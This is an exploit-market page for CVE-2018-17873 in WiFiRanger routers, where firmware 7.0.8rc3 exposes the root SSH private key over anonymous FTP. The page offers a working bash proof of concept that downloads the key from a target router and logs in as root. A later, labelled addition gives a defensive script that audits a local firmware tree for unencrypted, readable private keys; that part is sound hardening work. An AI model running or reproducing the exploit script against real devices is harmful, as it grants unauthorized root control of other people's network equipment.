0day Today Exploits Market and 0day Exploits Database

WiFiRanger 7.0.8rc3 Incorrect Access Control / Privilege Escalation Vulnerability

Author: Mitchel Jordan
Risk: Security Risk High
0day-ID: 0day-ID-31370
Category: local exploits
Date add: 21-10-2018
CVE: CVE-2018-17873
Platform: hardware
# Exploit Title: WiFiRanger 7.0.8rc3 Incorrect Access Control - Privilege Escalation (POC)
# Exploit Author: Mitchel Jordan
# Vendor Homepage: https://wifiranger.com/
# Firmware: Phantom 7.0.8rc3
# CVE: CVE-2018-17873

# Details:
# WiFiRanger indoor routers (Core, GoAC) and their outdoor paired routers (Sky Pro, EliteAC, EliteAC FM) running 
# firmware version 7.0.8rc3 and earlier allow anonymous FTP read/write access and have left the SSH Private Key
# in the clear - making it a trivial task to view/copy the key and log in with root privileges.
#
# Adjacent network access required to exploit this vulnerability.

# Exploit:
# Extremely simple shell script that grabs the private key and logs in as root.
#
# Usage: ./wifiRangerPwn.sh <WiFiRanger IP>

#!/bin/bash

wget "ftp://$1/sbc/aff/id_rsa"
chmod 600 id_rsa
ssh -i id_rsa root@$1
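
Added example, not part of the original advisory or any vendor code: a local audit that a firmware maintainer or device owner could run over a copy of the FTP-served tree (or an unpacked firmware root) to catch the condition described above, a private key stored without a passphrase where other users can read it. The function names and the `etc/host.pem` sample path are hypothetical; `sbc/aff/id_rsa` is the path used in the PoC.

```shell
#!/bin/sh
# Added example: audit a local directory tree for stored private keys.
# Assumption: the argument is a local copy of the FTP-served tree or an
# unpacked firmware root. Nothing here touches the network.
KEY_HDR='-----BEGIN ([A-Z]+ )?PRIVATE KEY-----'

# Legacy PEM and PKCS#8 show encryption in the header; the OpenSSH format
# hides it inside the body, so it is reported as "opaque".
classify_key() {
    if grep -aq -e '-----BEGIN OPENSSH PRIVATE KEY-----' "$1"; then
        echo opaque
    elif grep -aqE -e 'BEGIN ENCRYPTED PRIVATE KEY|^Proc-Type: 4,ENCRYPTED' "$1"; then
        echo encrypted
    else
        echo cleartext
    fi
}

# Eighth character of the ls mode string is the "other" read bit.
exposure() {
    case $(ls -ld -- "$1" | cut -c8) in
        r) echo world-readable ;;
        *) echo restricted ;;
    esac
}

# Prints "state<TAB>exposure<TAB>path" per key file; returns 1 if any key
# is stored without a passphrase. File names with newlines are not handled.
audit_tree() {
    report=$(find "$1" -type f -exec grep -alE -e "$KEY_HDR" {} + |
        while IFS= read -r f; do
            printf '%s\t%s\t%s\n' "$(classify_key "$f")" "$(exposure "$f")" "$f"
        done)
    [ -z "$report" ] || printf '%s\n' "$report"
    ! printf '%s\n' "$report" | grep -q '^cleartext'
}

# Constructed sample tree (placeholder bodies, not real keys).
make_sample_tree() {
    t=$(mktemp -d) && mkdir -p "$t/sbc/aff" "$t/etc"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'PLACEHOLDER' \
        '-----END RSA PRIVATE KEY-----' > "$t/sbc/aff/id_rsa"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'Proc-Type: 4,ENCRYPTED' \
        'PLACEHOLDER' '-----END RSA PRIVATE KEY-----' > "$t/etc/host.pem"
    chmod 644 "$t/sbc/aff/id_rsa"; chmod 600 "$t/etc/host.pem"
    echo "$t"
}

if [ "${1:-}" = demo ]; then set -- "$(make_sample_tree)"; fi
[ $# -eq 0 ] || audit_tree "$1"
```

The non-zero exit status makes the check usable as a gate in a firmware build pipeline; a key found this way should be treated as compromised and replaced, not just moved.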

#  0day.today [2024-12-25]  #